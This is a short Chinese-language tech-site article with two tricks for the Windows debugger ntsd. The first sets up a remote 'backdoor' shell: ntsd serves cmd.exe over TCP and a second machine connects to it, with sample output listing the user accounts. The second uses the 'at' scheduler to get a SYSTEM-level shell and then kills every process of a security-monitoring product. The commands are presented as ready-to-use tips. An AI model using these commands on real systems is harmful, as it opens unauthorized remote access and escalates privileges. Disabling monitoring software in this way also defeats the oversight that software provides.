ntsd的两个技巧

来源:未知 责任编辑:责任编辑 发表时间:2013-11-15 19:50 点击:

ntsd是win2000开始自带的命令行调试工具

一.简易后门

ntsd -server tcp:port=22 cmd.exe

在另一台机上:

ntsd -remote tcp:server=192.168.1.33,port=22

.shell

结果:

0:000> .shell
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:><.shell waiting 1 second(s) for process>
<.shell process may need input>net user
net user
<.shell waiting 1 second(s) for process>

\X-4F5625DB5B074 的用户帐户

——————————————————————————-
aaa                      Administrator            Guest
HelpAssistant            IUSR_X-4F5625DB5B074     IWAM_X-4F5625DB5B074
SUPPORT_388945a0         xhacker
命令成功完成。

C:><.shell waiting 1 second(s) for process>
<.shell process may need input>

二.杀进程

先用tasklist找到要杀的PID,然后ntsd -c q -p PID

有些程序需要system权限才能kill,假设现在系统时间是4:55PM
“开始 “-> “运行 “-> “at   16:56   /interactive   %systemroot%system32cmd.exe “-> 回车
这样在4:56PM就会得到一个system权限的shell
在这个shell里面使用ntsd命令把“北信源监控”的所有进程杀掉。

    发表评论
    请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
    用户名: 验证码:点击我更换图片
    最新评论 更多>>

    推荐热点

    • dos命令原来也能这样用?允许查找未知子目录指定文件
    •  windows的磁盘操作之八——格式化分区的思考
    • windows篇-第三章 安装和配置DNS服务器
    • windows篇-第二章 安装和配置Web服务器
    • windows篇-第一章 windows server 2008安装和简单配置
    •  windows server 2003断开远程之后自动注销用户
    • Windows服务器下用IIS Rewrite组件为IIS设置伪静态方法
    • Windows 2008 R2 SP1部署WSUS 3.0 SP2
    • Windows 7秘籍揭秘:用“手”写公式

    快速直达

    操作系统导航

    LinuxWindows虚拟机
    网站首页 - 友情链接 - 网站地图 - TAG标签 - RSS订阅 - 内容搜索
    Copyright © 2008-2015 计算机技术学习交流网. 版权所有

    豫ICP备11007008号-1